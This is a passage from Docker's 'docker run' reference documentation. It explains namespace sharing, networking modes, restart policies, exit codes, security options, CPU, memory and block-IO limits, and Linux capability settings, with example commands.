unchanged, -the digest value is predictable and referenceable. - -The following example runs a container from the `alpine` image with the -`sha256:9cacb71397b640eca97488cf08582ae4e4068513101088e9f96c9814bfda95e0` digest: - - $ docker run alpine@sha256:9cacb71397b640eca97488cf08582ae4e4068513101088e9f96c9814bfda95e0 date - -## PID settings (--pid) - - --pid="" : Set the PID (Process) Namespace mode for the container, - 'container:': joins another container's PID namespace - 'host': use the host's PID namespace inside the container - -By default, all containers have the PID namespace enabled. - -PID namespace provides separation of processes. The PID Namespace removes the -view of the system processes, and allows process ids to be reused including -pid 1. - -In certain cases you want your container to share the host's process namespace, -basically allowing processes within the container to see all of the processes -on the system. For example, you could build a container with debugging tools -like `strace` or `gdb`, but want to use these tools when debugging processes -within the container. - -### Example: run htop inside a container - -Create this Dockerfile: - -``` -FROM alpine:latest -RUN apk add --update htop && rm -rf /var/cache/apk/* -CMD ["htop"] -``` - -Build the Dockerfile and tag the image as `myhtop`: - -```bash -$ docker build -t myhtop . -``` - -Use the following command to run `htop` inside a container: - -``` -$ docker run -it --rm --pid=host myhtop -``` - -Joining another container's pid namespace can be used for debugging that container. - -### Example - -Start a container running a redis server: - -```bash -$ docker run --name my-redis -d redis -``` - -Debug the redis container by running another container that has strace in it: - -```bash -$ docker run -it --pid=container:my-redis my_strace_docker_image bash -$ strace -p 1 -``` - -## UTS settings (--uts) - - --uts="" : Set the UTS namespace mode for the container, - 'host': use the host's UTS namespace inside the container - -The UTS namespace is for setting the hostname and the domain that is visible -to running processes in that namespace. By default, all containers, including -those with `--network=host`, have their own UTS namespace. The `host` setting will -result in the container using the same UTS namespace as the host. Note that -`--hostname` is invalid in `host` UTS mode. - -You may wish to share the UTS namespace with the host if you would like the -hostname of the container to change as the hostname of the host changes. A -more advanced use case would be changing the host's hostname from a container. - -## IPC settings (--ipc) - - --ipc="" : Set the IPC mode for the container, - 'container:': reuses another container's IPC namespace - 'host': use the host's IPC namespace inside the container - -By default, all containers have the IPC namespace enabled. - -IPC (POSIX/SysV IPC) namespace provides separation of named shared memory -segments, semaphores and message queues. - -Shared memory segments are used to accelerate inter-process communication at -memory speed, rather than through pipes or through the network stack. Shared -memory is commonly used by databases and custom-built (typically C/OpenMPI, -C++/using boost libraries) high performance applications for scientific -computing and financial services industries. If these types of applications -are broken into multiple containers, you might need to share the IPC mechanisms -of the containers. - -## Network settings - - --dns=[] : Set custom dns servers for the container - --network="bridge" : Connect a container to a network - 'bridge': create a network stack on the default Docker bridge - 'none': no networking - 'container:': reuse another container's network stack - 'host': use the Docker host network stack - '|': connect to a user-defined network - --network-alias=[] : Add network-scoped alias for the container - --add-host="" : Add a line to /etc/hosts (host:IP) - --mac-address="" : Sets the container's Ethernet device's MAC address - --ip="" : Sets the container's Ethernet device's IPv4 address - --ip6="" : Sets the container's Ethernet device's IPv6 address - --link-local-ip=[] : Sets one or more container's Ethernet device's link local IPv4/IPv6 addresses - -By default, all containers have networking enabled and they can make any -outgoing connections. The operator can completely disable networking -with `docker run --network none` which disables all incoming and outgoing -networking. In cases like this, you would perform I/O through files or -`STDIN` and `STDOUT` only. - -Publishing ports and linking to other containers only works with the default (bridge). The linking feature is a legacy feature. You should always prefer using Docker network drivers over linking. - -Your container will use the same DNS servers as the host by default, but -you can override this with `--dns`. - -By default, the MAC address is generated using the IP address allocated to the -container. You can set the container's MAC address explicitly by providing a -MAC address via the `--mac-address` parameter (format:`12:34:56:78:9a:bc`).Be -aware that Docker does not check if manually specified MAC addresses are unique. - -Supported networks : - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
NetworkDescription
none - No networking in the container. -
bridge (default) - Connect the container to the bridge via veth interfaces. -
host - Use the host's network stack inside the container. -
container:<name|id> - Use the network stack of another container, specified via - its name or id. -
NETWORK - Connects the container to a user created network (using docker network create command) -
- -#### Network: none - -With the network is `none` a container will not have -access to any external routes. The container will still have a -`loopback` interface enabled in the container but it does not have any -routes to external traffic. - -#### Network: bridge - -With the network set to `bridge` a container will use docker's -default networking setup. A bridge is setup on the host, commonly named -`docker0`, and a pair of `veth` interfaces will be created for the -container. One side of the `veth` pair will remain on the host attached -to the bridge while the other side of the pair will be placed inside the -container's namespaces in addition to the `loopback` interface. An IP -address will be allocated for containers on the bridge's network and -traffic will be routed though this bridge to the container. - -Containers can communicate via their IP addresses by default. To communicate by -name, they must be linked. - -#### Network: host - -With the network set to `host` a container will share the host's -network stack and all interfaces from the host will be available to the -container. The container's hostname will match the hostname on the host -system. Note that `--mac-address` is invalid in `host` netmode. Even in `host` -network mode a container has its own UTS namespace by default. As such -`--hostname` is allowed in `host` network mode and will only change the -hostname inside the container. -Similar to `--hostname`, the `--add-host`, `--dns`, `--dns-search`, and -`--dns-option` options can be used in `host` network mode. These options update -`/etc/hosts` or `/etc/resolv.conf` inside the container. No change are made to -`/etc/hosts` and `/etc/resolv.conf` on the host. - -Compared to the default `bridge` mode, the `host` mode gives *significantly* -better networking performance since it uses the host's native networking stack -whereas the bridge has to go through one level of virtualization through the -docker daemon. It is recommended to run containers in this mode when their -networking performance is critical, for example, a production Load Balancer -or a High Performance Web Server. - -> **Note**: `--network="host"` gives the container full access to local system -> services such as D-bus and is therefore considered insecure. - -#### Network: container - -With the network set to `container` a container will share the -network stack of another container. The other container's name must be -provided in the format of `--network container:`. Note that `--add-host` -`--hostname` `--dns` `--dns-search` `--dns-option` and `--mac-address` are -invalid in `container` netmode, and `--publish` `--publish-all` `--expose` are -also invalid in `container` netmode. - -Example running a Redis container with Redis binding to `localhost` then -running the `redis-cli` command and connecting to the Redis server over the -`localhost` interface. - - $ docker run -d --name redis example/redis --bind 127.0.0.1 - $ # use the redis container's network stack to access localhost - $ docker run --rm -it --network container:redis example/redis-cli -h 127.0.0.1 - -#### User-defined network - -You can create a network using a Docker network driver or an external network -driver plugin. You can connect multiple containers to the same network. Once -connected to a user-defined network, the containers can communicate easily using -only another container's IP address or name. - -For `overlay` networks or custom plugins that support multi-host connectivity, -containers connected to the same multi-host network but launched from different -Engines can also communicate in this way. - -The following example creates a network using the built-in `bridge` network -driver and running a container in the created network - -``` -$ docker network create -d bridge my-net -$ docker run --network=my-net -itd --name=container3 busybox -``` - -### Managing /etc/hosts - -Your container will have lines in `/etc/hosts` which define the hostname of the -container itself as well as `localhost` and a few other common things. The -`--add-host` flag can be used to add additional lines to `/etc/hosts`. - - $ docker run -it --add-host db-static:86.75.30.9 ubuntu cat /etc/hosts - 172.17.0.22 09d03f76bf2c - fe00::0 ip6-localnet - ff00::0 ip6-mcastprefix - ff02::1 ip6-allnodes - ff02::2 ip6-allrouters - 127.0.0.1 localhost - ::1 localhost ip6-localhost ip6-loopback - 86.75.30.9 db-static - -If a container is connected to the default bridge network and `linked` -with other containers, then the container's `/etc/hosts` file is updated -with the linked container's name. - -If the container is connected to user-defined network, the container's -`/etc/hosts` file is updated with names of all other containers in that -user-defined network. - -> **Note** Since Docker may live update the container’s `/etc/hosts` file, there -may be situations when processes inside the container can end up reading an -empty or incomplete `/etc/hosts` file. In most cases, retrying the read again -should fix the problem. - -## Restart policies (--restart) - -Using the `--restart` flag on Docker run you can specify a restart policy for -how a container should or should not be restarted on exit. - -When a restart policy is active on a container, it will be shown as either `Up` -or `Restarting` in [`docker ps`](commandline/ps.md). It can also be -useful to use [`docker events`](commandline/events.md) to see the -restart policy in effect. - -Docker supports the following restart policies: - - - - - - - - - - - - - - - - - - - - - - - - - - -
PolicyResult
no - Do not automatically restart the container when it exits. This is the - default. -
- - on-failure[:max-retries] - - - Restart only if the container exits with a non-zero exit status. - Optionally, limit the number of restart retries the Docker - daemon attempts. -
always - Always restart the container regardless of the exit status. - When you specify always, the Docker daemon will try to restart - the container indefinitely. The container will also always start - on daemon startup, regardless of the current state of the container. -
unless-stopped - Always restart the container regardless of the exit status, but - do not start it on daemon startup if the container has been put - to a stopped state before. -
- -An ever increasing delay (double the previous delay, starting at 100 -milliseconds) is added before each restart to prevent flooding the server. -This means the daemon will wait for 100 ms, then 200 ms, 400, 800, 1600, -and so on until either the `on-failure` limit is hit, or when you `docker stop` -or `docker rm -f` the container. - -If a container is successfully restarted (the container is started and runs -for at least 10 seconds), the delay is reset to its default value of 100 ms. - -You can specify the maximum amount of times Docker will try to restart the -container when using the **on-failure** policy. The default is that Docker -will try forever to restart the container. The number of (attempted) restarts -for a container can be obtained via [`docker inspect`](commandline/inspect.md). For example, to get the number of restarts -for container "my-container"; - - {% raw %} - $ docker inspect -f "{{ .RestartCount }}" my-container - # 2 - {% endraw %} - -Or, to get the last time the container was (re)started; - - {% raw %} - $ docker inspect -f "{{ .State.StartedAt }}" my-container - # 2015-03-04T23:47:07.691840179Z - {% endraw %} - - -Combining `--restart` (restart policy) with the `--rm` (clean up) flag results -in an error. On container restart, attached clients are disconnected. See the -examples on using the [`--rm` (clean up)](#clean-up-rm) flag later in this page. - -### Examples - - $ docker run --restart=always redis - -This will run the `redis` container with a restart policy of **always** -so that if the container exits, Docker will restart it. - - $ docker run --restart=on-failure:10 redis - -This will run the `redis` container with a restart policy of **on-failure** -and a maximum restart count of 10. If the `redis` container exits with a -non-zero exit status more than 10 times in a row Docker will abort trying to -restart the container. Providing a maximum restart limit is only valid for the -**on-failure** policy. - -## Exit Status - -The exit code from `docker run` gives information about why the container -failed to run or why it exited. When `docker run` exits with a non-zero code, -the exit codes follow the `chroot` standard, see below: - -**_125_** if the error is with Docker daemon **_itself_** - - $ docker run --foo busybox; echo $? - # flag provided but not defined: --foo - See 'docker run --help'. - 125 - -**_126_** if the **_contained command_** cannot be invoked - - $ docker run busybox /etc; echo $? - # docker: Error response from daemon: Container command '/etc' could not be invoked. - 126 - -**_127_** if the **_contained command_** cannot be found - - $ docker run busybox foo; echo $? - # docker: Error response from daemon: Container command 'foo' not found or does not exist. - 127 - -**_Exit code_** of **_contained command_** otherwise - - $ docker run busybox /bin/sh -c 'exit 3'; echo $? - # 3 - -## Clean up (--rm) - -By default a container's file system persists even after the container -exits. This makes debugging a lot easier (since you can inspect the -final state) and you retain all your data by default. But if you are -running short-term **foreground** processes, these container file -systems can really pile up. If instead you'd like Docker to -**automatically clean up the container and remove the file system when -the container exits**, you can add the `--rm` flag: - - --rm=false: Automatically remove the container when it exits (incompatible with -d) - -> **Note**: When you set the `--rm` flag, Docker also removes the volumes -associated with the container when the container is removed. This is similar -to running `docker rm -v my-container`. Only volumes that are specified without a -name are removed. For example, with -`docker run --rm -v /foo -v awesome:/bar busybox top`, the volume for `/foo` will be removed, -but the volume for `/bar` will not. Volumes inherited via `--volumes-from` will be removed -with the same logic -- if the original volume was specified with a name it will **not** be removed. - -## Security configuration - --security-opt="label=user:USER" : Set the label user for the container - --security-opt="label=role:ROLE" : Set the label role for the container - --security-opt="label=type:TYPE" : Set the label type for the container - --security-opt="label=level:LEVEL" : Set the label level for the container - --security-opt="label=disable" : Turn off label confinement for the container - --security-opt="apparmor=PROFILE" : Set the apparmor profile to be applied to the container - --security-opt="no-new-privileges" : Disable container processes from gaining new privileges - --security-opt="seccomp=unconfined" : Turn off seccomp confinement for the container - --security-opt="seccomp=profile.json": White listed syscalls seccomp Json file to be used as a seccomp filter - - -You can override the default labeling scheme for each container by specifying -the `--security-opt` flag. Specifying the level in the following command -allows you to share the same content between containers. - - $ docker run --security-opt label=level:s0:c100,c200 -it fedora bash - -> **Note**: Automatic translation of MLS labels is not currently supported. - -To disable the security labeling for this container versus running with the -`--privileged` flag, use the following command: - - $ docker run --security-opt label=disable -it fedora bash - -If you want a tighter security policy on the processes within a container, -you can specify an alternate type for the container. You could run a container -that is only allowed to listen on Apache ports by executing the following -command: - - $ docker run --security-opt label=type:svirt_apache_t -it centos bash - -> **Note**: You would have to write policy defining a `svirt_apache_t` type. - -If you want to prevent your container processes from gaining additional -privileges, you can execute the following command: - - $ docker run --security-opt no-new-privileges -it centos bash - -This means that commands that raise privileges such as `su` or `sudo` will no longer work. -It also causes any seccomp filters to be applied later, after privileges have been dropped -which may mean you can have a more restrictive set of filters. -For more details, see the [kernel documentation](https://www.kernel.org/doc/Documentation/prctl/no_new_privs.txt). - -## Specifying custom cgroups - -Using the `--cgroup-parent` flag, you can pass a specific cgroup to run a -container in. This allows you to create and manage cgroups on their own. You can -define custom resources for those cgroups and put containers under a common -parent group. - -## Runtime constraints on resources - -The operator can also adjust the performance parameters of the -container: - -| Option | Description | -| -------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------- | -| `-m`, `--memory=""` | Memory limit (format: `[]`). Number is a positive integer. Unit can be one of `b`, `k`, `m`, or `g`. Minimum is 4M. | -| `--memory-swap=""` | Total memory limit (memory + swap, format: `[]`). Number is a positive integer. Unit can be one of `b`, `k`, `m`, or `g`. | -| `--memory-reservation=""` | Memory soft limit (format: `[]`). Number is a positive integer. Unit can be one of `b`, `k`, `m`, or `g`. | -| `--kernel-memory=""` | Kernel memory limit (format: `[]`). Number is a positive integer. Unit can be one of `b`, `k`, `m`, or `g`. Minimum is 4M. | -| `-c`, `--cpu-shares=0` | CPU shares (relative weight) | -| `--cpus=0.000` | Number of CPUs. Number is a fractional number. 0.000 means no limit. | -| `--cpu-period=0` | Limit the CPU CFS (Completely Fair Scheduler) period | -| `--cpuset-cpus=""` | CPUs in which to allow execution (0-3, 0,1) | -| `--cpuset-mems=""` | Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems. | -| `--cpu-quota=0` | Limit the CPU CFS (Completely Fair Scheduler) quota | -| `--cpu-rt-period=0` | Limit the CPU real-time period. In microseconds. Requires parent cgroups be set and cannot be higher than parent. Also check rtprio ulimits. | -| `--cpu-rt-runtime=0` | Limit the CPU real-time runtime. In microseconds. Requires parent cgroups be set and cannot be higher than parent. Also check rtprio ulimits. | -| `--blkio-weight=0` | Block IO weight (relative weight) accepts a weight value between 10 and 1000. | -| `--blkio-weight-device=""` | Block IO weight (relative device weight, format: `DEVICE_NAME:WEIGHT`) | -| `--device-read-bps=""` | Limit read rate from a device (format: `:[]`). Number is a positive integer. Unit can be one of `kb`, `mb`, or `gb`. | -| `--device-write-bps=""` | Limit write rate to a device (format: `:[]`). Number is a positive integer. Unit can be one of `kb`, `mb`, or `gb`. | -| `--device-read-iops="" ` | Limit read rate (IO per second) from a device (format: `:`). Number is a positive integer. | -| `--device-write-iops="" ` | Limit write rate (IO per second) to a device (format: `:`). Number is a positive integer. | -| `--oom-kill-disable=false` | Whether to disable OOM Killer for the container or not. | -| `--oom-score-adj=0` | Tune container's OOM preferences (-1000 to 1000) | -| `--memory-swappiness=""` | Tune a container's memory swappiness behavior. Accepts an integer between 0 and 100. | -| `--shm-size=""` | Size of `/dev/shm`. The format is ``. `number` must be greater than `0`. Unit is optional and can be `b` (bytes), `k` (kilobytes), `m` (megabytes), or `g` (gigabytes). If you omit the unit, the system uses bytes. If you omit the size entirely, the system uses `64m`. | - -### User memory constraints - -We have four ways to set user memory usage: - - - - - - - - - - - - - - - - - - - - - - - - - - -
OptionResult
- memory=inf, memory-swap=inf (default) - - There is no memory limit for the container. The container can use - as much memory as needed. -
memory=L<inf, memory-swap=inf - (specify memory and set memory-swap as -1) The container is - not allowed to use more than L bytes of memory, but can use as much swap - as is needed (if the host supports swap memory). -
memory=L<inf, memory-swap=2*L - (specify memory without memory-swap) The container is not allowed to - use more than L bytes of memory, swap plus memory usage is double - of that. -
- memory=L<inf, memory-swap=S<inf, L<=S - - (specify both memory and memory-swap) The container is not allowed to - use more than L bytes of memory, swap plus memory usage is limited - by S. -
- -Examples: - - $ docker run -it ubuntu:14.04 /bin/bash - -We set nothing about memory, this means the processes in the container can use -as much memory and swap memory as they need. - - $ docker run -it -m 300M --memory-swap -1 ubuntu:14.04 /bin/bash - -We set memory limit and disabled swap memory limit, this means the processes in -the container can use 300M memory and as much swap memory as they need (if the -host supports swap memory). - - $ docker run -it -m 300M ubuntu:14.04 /bin/bash - -We set memory limit only, this means the processes in the container can use -300M memory and 300M swap memory, by default, the total virtual memory size -(--memory-swap) will be set as double of memory, in this case, memory + swap -would be 2*300M, so processes can use 300M swap memory as well. - - $ docker run -it -m 300M --memory-swap 1G ubuntu:14.04 /bin/bash - -We set both memory and swap memory, so the processes in the container can use -300M memory and 700M swap memory. - -Memory reservation is a kind of memory soft limit that allows for greater -sharing of memory. Under normal circumstances, containers can use as much of -the memory as needed and are constrained only by the hard limits set with the -`-m`/`--memory` option. When memory reservation is set, Docker detects memory -contention or low memory and forces containers to restrict their consumption to -a reservation limit. - -Always set the memory reservation value below the hard limit, otherwise the hard -limit takes precedence. A reservation of 0 is the same as setting no -reservation. By default (without reservation set), memory reservation is the -same as the hard memory limit. - -Memory reservation is a soft-limit feature and does not guarantee the limit -won't be exceeded. Instead, the feature attempts to ensure that, when memory is -heavily contended for, memory is allocated based on the reservation hints/setup. - -The following example limits the memory (`-m`) to 500M and sets the memory -reservation to 200M. - -```bash -$ docker run -it -m 500M --memory-reservation 200M ubuntu:14.04 /bin/bash -``` - -Under this configuration, when the container consumes memory more than 200M and -less than 500M, the next system memory reclaim attempts to shrink container -memory below 200M. - -The following example set memory reservation to 1G without a hard memory limit. - -```bash -$ docker run -it --memory-reservation 1G ubuntu:14.04 /bin/bash -``` - -The container can use as much memory as it needs. The memory reservation setting -ensures the container doesn't consume too much memory for long time, because -every memory reclaim shrinks the container's consumption to the reservation. - -By default, kernel kills processes in a container if an out-of-memory (OOM) -error occurs. To change this behaviour, use the `--oom-kill-disable` option. -Only disable the OOM killer on containers where you have also set the -`-m/--memory` option. If the `-m` flag is not set, this can result in the host -running out of memory and require killing the host's system processes to free -memory. - -The following example limits the memory to 100M and disables the OOM killer for -this container: - - $ docker run -it -m 100M --oom-kill-disable ubuntu:14.04 /bin/bash - -The following example, illustrates a dangerous way to use the flag: - - $ docker run -it --oom-kill-disable ubuntu:14.04 /bin/bash - -The container has unlimited memory which can cause the host to run out memory -and require killing system processes to free memory. The `--oom-score-adj` -parameter can be changed to select the priority of which containers will -be killed when the system is out of memory, with negative scores making them -less likely to be killed an positive more likely. - -### Kernel memory constraints - -Kernel memory is fundamentally different than user memory as kernel memory can't -be swapped out. The inability to swap makes it possible for the container to -block system services by consuming too much kernel memory. Kernel memory includes: - - - stack pages - - slab pages - - sockets memory pressure - - tcp memory pressure - -You can setup kernel memory limit to constrain these kinds of memory. For example, -every process consumes some stack pages. By limiting kernel memory, you can -prevent new processes from being created when the kernel memory usage is too high. - -Kernel memory is never completely independent of user memory. Instead, you limit -kernel memory in the context of the user memory limit. Assume "U" is the user memory -limit and "K" the kernel limit. There are three possible ways to set limits: - - - - - - - - - - - - - - - - - - - - - - -
OptionResult
U != 0, K = inf (default) - This is the standard memory limitation mechanism already present before using - kernel memory. Kernel memory is completely ignored. -
U != 0, K < U - Kernel memory is a subset of the user memory. This setup is useful in - deployments where the total amount of memory per-cgroup is overcommitted. - Overcommitting kernel memory limits is definitely not recommended, since the - box can still run out of non-reclaimable memory. - In this case, you can configure K so that the sum of all groups is - never greater than the total memory. Then, freely set U at the expense of - the system's service quality. -
U != 0, K > U - Since kernel memory charges are also fed to the user counter and reclamation - is triggered for the container for both kinds of memory. This configuration - gives the admin a unified view of memory. It is also useful for people - who just want to track kernel memory usage. -
- -Examples: - - $ docker run -it -m 500M --kernel-memory 50M ubuntu:14.04 /bin/bash - -We set memory and kernel memory, so the processes in the container can use -500M memory in total, in this 500M memory, it can be 50M kernel memory tops. - - $ docker run -it --kernel-memory 50M ubuntu:14.04 /bin/bash - -We set kernel memory without **-m**, so the processes in the container can -use as much memory as they want, but they can only use 50M kernel memory. - -### Swappiness constraint - -By default, a container's kernel can swap out a percentage of anonymous pages. -To set this percentage for a container, specify a `--memory-swappiness` value -between 0 and 100. A value of 0 turns off anonymous page swapping. A value of -100 sets all anonymous pages as swappable. By default, if you are not using -`--memory-swappiness`, memory swappiness value will be inherited from the parent. - -For example, you can set: - - $ docker run -it --memory-swappiness=0 ubuntu:14.04 /bin/bash - -Setting the `--memory-swappiness` option is helpful when you want to retain the -container's working set and to avoid swapping performance penalties. - -### CPU share constraint - -By default, all containers get the same proportion of CPU cycles. This proportion -can be modified by changing the container's CPU share weighting relative -to the weighting of all other running containers. - -To modify the proportion from the default of 1024, use the `-c` or `--cpu-shares` -flag to set the weighting to 2 or higher. If 0 is set, the system will ignore the -value and use the default of 1024. - -The proportion will only apply when CPU-intensive processes are running. -When tasks in one container are idle, other containers can use the -left-over CPU time. The actual amount of CPU time will vary depending on -the number of containers running on the system. - -For example, consider three containers, one has a cpu-share of 1024 and -two others have a cpu-share setting of 512. When processes in all three -containers attempt to use 100% of CPU, the first container would receive -50% of the total CPU time. If you add a fourth container with a cpu-share -of 1024, the first container only gets 33% of the CPU. The remaining containers -receive 16.5%, 16.5% and 33% of the CPU. - -On a multi-core system, the shares of CPU time are distributed over all CPU -cores. Even if a container is limited to less than 100% of CPU time, it can -use 100% of each individual CPU core. - -For example, consider a system with more than three cores. If you start one -container `{C0}` with `-c=512` running one process, and another container -`{C1}` with `-c=1024` running two processes, this can result in the following -division of CPU shares: - - PID container CPU CPU share - 100 {C0} 0 100% of CPU0 - 101 {C1} 1 100% of CPU1 - 102 {C1} 2 100% of CPU2 - -### CPU period constraint - -The default CPU CFS (Completely Fair Scheduler) period is 100ms. We can use -`--cpu-period` to set the period of CPUs to limit the container's CPU usage. -And usually `--cpu-period` should work with `--cpu-quota`. - -Examples: - - $ docker run -it --cpu-period=50000 --cpu-quota=25000 ubuntu:14.04 /bin/bash - -If there is 1 CPU, this means the container can get 50% CPU worth of run-time every 50ms. - -In addition to use `--cpu-period` and `--cpu-quota` for setting CPU period constraints, -it is possible to specify `--cpus` with a float number to achieve the same purpose. -For example, if there is 1 CPU, then `--cpus=0.5` will achieve the same result as -setting `--cpu-period=50000` and `--cpu-quota=25000` (50% CPU). - -The default value for `--cpus` is `0.000`, which means there is no limit. - -For more information, see the [CFS documentation on bandwidth limiting](https://www.kernel.org/doc/Documentation/scheduler/sched-bwc.txt). - -### Cpuset constraint - -We can set cpus in which to allow execution for containers. - -Examples: - - $ docker run -it --cpuset-cpus="1,3" ubuntu:14.04 /bin/bash - -This means processes in container can be executed on cpu 1 and cpu 3. - - $ docker run -it --cpuset-cpus="0-2" ubuntu:14.04 /bin/bash - -This means processes in container can be executed on cpu 0, cpu 1 and cpu 2. - -We can set mems in which to allow execution for containers. Only effective -on NUMA systems. - -Examples: - - $ docker run -it --cpuset-mems="1,3" ubuntu:14.04 /bin/bash - -This example restricts the processes in the container to only use memory from -memory nodes 1 and 3. - - $ docker run -it --cpuset-mems="0-2" ubuntu:14.04 /bin/bash - -This example restricts the processes in the container to only use memory from -memory nodes 0, 1 and 2. - -### CPU quota constraint - -The `--cpu-quota` flag limits the container's CPU usage. The default 0 value -allows the container to take 100% of a CPU resource (1 CPU). The CFS (Completely Fair -Scheduler) handles resource allocation for executing processes and is default -Linux Scheduler used by the kernel. Set this value to 50000 to limit the container -to 50% of a CPU resource. For multiple CPUs, adjust the `--cpu-quota` as necessary. -For more information, see the [CFS documentation on bandwidth limiting](https://www.kernel.org/doc/Documentation/scheduler/sched-bwc.txt). - -### Block IO bandwidth (Blkio) constraint - -By default, all containers get the same proportion of block IO bandwidth -(blkio). This proportion is 500. To modify this proportion, change the -container's blkio weight relative to the weighting of all other running -containers using the `--blkio-weight` flag. - -> **Note:** The blkio weight setting is only available for direct IO. Buffered IO -> is not currently supported. - -The `--blkio-weight` flag can set the weighting to a value between 10 to 1000. -For example, the commands below create two containers with different blkio -weight: - - $ docker run -it --name c1 --blkio-weight 300 ubuntu:14.04 /bin/bash - $ docker run -it --name c2 --blkio-weight 600 ubuntu:14.04 /bin/bash - -If you do block IO in the two containers at the same time, by, for example: - - $ time dd if=/mnt/zerofile of=test.out bs=1M count=1024 oflag=direct - -You'll find that the proportion of time is the same as the proportion of blkio -weights of the two containers. - -The `--blkio-weight-device="DEVICE_NAME:WEIGHT"` flag sets a specific device weight. -The `DEVICE_NAME:WEIGHT` is a string containing a colon-separated device name and weight. -For example, to set `/dev/sda` device weight to `200`: - - $ docker run -it \ - --blkio-weight-device "/dev/sda:200" \ - ubuntu - -If you specify both the `--blkio-weight` and `--blkio-weight-device`, Docker -uses the `--blkio-weight` as the default weight and uses `--blkio-weight-device` -to override this default with a new value on a specific device. -The following example uses a default weight of `300` and overrides this default -on `/dev/sda` setting that weight to `200`: - - $ docker run -it \ - --blkio-weight 300 \ - --blkio-weight-device "/dev/sda:200" \ - ubuntu - -The `--device-read-bps` flag limits the read rate (bytes per second) from a device. -For example, this command creates a container and limits the read rate to `1mb` -per second from `/dev/sda`: - - $ docker run -it --device-read-bps /dev/sda:1mb ubuntu - -The `--device-write-bps` flag limits the write rate (bytes per second)to a device. -For example, this command creates a container and limits the write rate to `1mb` -per second for `/dev/sda`: - - $ docker run -it --device-write-bps /dev/sda:1mb ubuntu - -Both flags take limits in the `:[unit]` format. Both read -and write rates must be a positive integer. You can specify the rate in `kb` -(kilobytes), `mb` (megabytes), or `gb` (gigabytes). - -The `--device-read-iops` flag limits read rate (IO per second) from a device. -For example, this command creates a container and limits the read rate to -`1000` IO per second from `/dev/sda`: - - $ docker run -ti --device-read-iops /dev/sda:1000 ubuntu - -The `--device-write-iops` flag limits write rate (IO per second) to a device. -For example, this command creates a container and limits the write rate to -`1000` IO per second to `/dev/sda`: - - $ docker run -ti --device-write-iops /dev/sda:1000 ubuntu - -Both flags take limits in the `:` format. Both read and -write rates must be a positive integer. - -## Additional groups - --group-add: Add additional groups to run as - -By default, the docker container process runs with the supplementary groups looked -up for the specified user. If one wants to add more to that list of groups, then -one can use this flag: - - $ docker run --rm --group-add audio --group-add nogroup --group-add 777 busybox id - uid=0(root) gid=0(root) groups=10(wheel),29(audio),99(nogroup),777 - -## Runtime privilege and Linux capabilities - - --cap-add: Add Linux capabilities - --cap-drop: Drop Linux capabilities - --privileged=false: Give extended privileges to this container - --device=[]: Allows you to run devices inside the container without the --privileged flag. - -By default, Docker containers are "unprivileged" and cannot, for -example, run a Docker daemon inside a Docker container. This is because -by default a container is not allowed to access any devices, but a -"privileged" container is given access to all devices (see -the documentation on [cgroups devices](https://www.kernel.org/doc/Documentation/cgroup-v1/devices.txt)). - -When the operator executes `docker run --privileged`, Docker will enable -to access to all devices on the host as well as set some configuration -in AppArmor or SELinux to allow the container nearly all the same access to the -host as processes running outside containers on the host. Additional -information about running with `--privileged` is available on the -[Docker Blog](http://blog.docker.com/2013/09/docker-can-now-run-within-docker/). - -If you want to limit access to a specific device or devices you can use -the `--device` flag. It allows you to specify one or more devices that -will be accessible within the container. - - $ docker run --device=/dev/snd:/dev/snd ... - -By default, the container will be able to `read`, `write`, and `mknod` these devices. -This can be overridden using a third `:rwm` set of options to each `--device` flag: - - $ docker run --device=/dev/sda:/dev/xvdc --rm -it ubuntu fdisk /dev/xvdc - - Command (m for help): q - $ docker run --device=/dev/sda:/dev/xvdc:r --rm -it ubuntu fdisk /dev/xvdc - You will not be able to write the partition table. - - Command (m for help): q - - $ docker run --device=/dev/sda:/dev/xvdc:w --rm -it ubuntu fdisk /dev/xvdc - crash.... - - $ docker run --device=/dev/sda:/dev/xvdc:m --rm -it ubuntu fdisk /dev/xvdc - fdisk: unable to open /dev/xvdc: Operation not permitted - -In addition to `--privileged`, the operator can have fine grain control over the -capabilities using `--cap-add` and `--cap-drop`. By default, Docker has a default -list of capabilities that are kept. The following table lists the Linux capability -options which are allowed by default and can be dropped. - -| Capability Key | Capability Description | -| ---------------- | ----------------------------------------------------------------------------------------------------------------------------- | -| SETPCAP | Modify process capabilities. | -| MKNOD | Create special files using mknod(2). | -| AUDIT_WRITE | Write records to kernel auditing log. | -| CHOWN | Make arbitrary changes to file UIDs and GIDs (see chown(2)). | -| NET_RAW | Use RAW and PACKET sockets. | -| DAC_OVERRIDE | Bypass file read, write, and execute permission checks. | -| FOWNER | Bypass permission checks on operations that normally require the file system UID of the process to match the UID of the file. | -| FSETID | Don't clear set-user-ID and set-group-ID permission bits when a file is modified. | -| KILL | Bypass permission checks for sending signals. | -| SETGID | Make arbitrary manipulations of process GIDs and supplementary GID list. | -| SETUID | Make arbitrary manipulations of process UIDs. | -| NET_BIND_SERVICE | Bind a socket to internet domain privileged ports (port numbers less than 1024). | -| SYS_CHROOT | Use chroot(2), change root directory. | -| SETFCAP | Set file capabilities. | - -The next table shows the capabilities which are not granted by default and may be added. - -| Capability Key | Capability Description | -| ---------------- | ----------------------------------------------------------------------------------------------------------------------------- | -| SYS_MODULE | Load and unload kernel modules. | -| SYS_RAWIO | Perform I/O port operations (iopl(2) and ioperm(2)). | -| SYS_PACCT | Use acct(2), switch process accounting on or off. | -| SYS_ADMIN | Perform a range of system administration operations. | -| SYS_NICE | Raise process nice value (nice(2), setpriority(2)) and change the nice value for arbitrary processes. | -| SYS_RESOURCE | Override resource Limits. | -| SYS_TIME | Set system clock (settimeofday(2), stime(2), adjtimex(2)); set real-time (hardware) clock. | -| SYS_TTY_CONFIG | Use vhangup(2); employ various privileged ioctl(2) operations on virtual terminals. | -| AUDIT_CONTROL | Enable and disable kernel auditing; change auditing filter rules; retrieve auditing status and filtering rules. | -| MAC_OVERRIDE | Allow MAC configuration or state changes. Implemented for the Smack LSM. | -| MAC_ADMIN | Override Mandatory Access Control (MAC). Implemented for the Smack Linux Security Module (LSM). | -| NET_ADMIN | Perform various network-related operations. | -| SYSLOG | Perform privileged syslog(2) operations. | -| DAC_READ_SEARCH | Bypass file read permission checks and directory read and execute permission checks. | -| LINUX_IMMUTABLE | Set the FS_APPEND_FL and FS_IMMUTABLE_FL i-node flags. | -| NET_BROADCAST | Make socket broadcasts, and listen to multicasts. | -| IPC_LOCK | Lock memory (mlock(2), 